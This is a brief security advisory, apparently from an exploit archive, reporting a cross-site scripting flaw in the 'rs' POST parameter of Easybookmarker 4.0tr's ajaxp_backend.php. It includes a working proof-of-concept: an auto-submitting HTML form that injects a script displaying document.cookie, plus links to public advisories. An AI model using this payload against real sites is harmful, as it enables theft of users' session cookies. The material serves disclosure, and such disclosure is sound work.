----------------------------------------------------------------
Script : Easybookmarker 40tr
Type : Xss Vulnerability
Method : POST
Alert : High
----------------------------------------------------------------
Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
My Offical Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
----------------------------------------------------------------
Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
----------------------------------------------------------------
Script Download : http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip
----------------------------------------------------------------
Xss Vulnerability :
Variable : rs
Send Method : POST
Set rs variable with post method in ajaxp_backend.php : <script>alert('xss')</script> for test vulnerability
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://example/zomplog/ajaxp_backend.php"
method="POST" name="form">
<input type="hidden" name="rs" value="" <script>alert(document.cookie)</script>">
</form>
</body>
</html>
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
----------------------------------------------------------------
Downloadhttp://www.securityfocus.com/bid/30304
http://secunia.com/advisories/31191/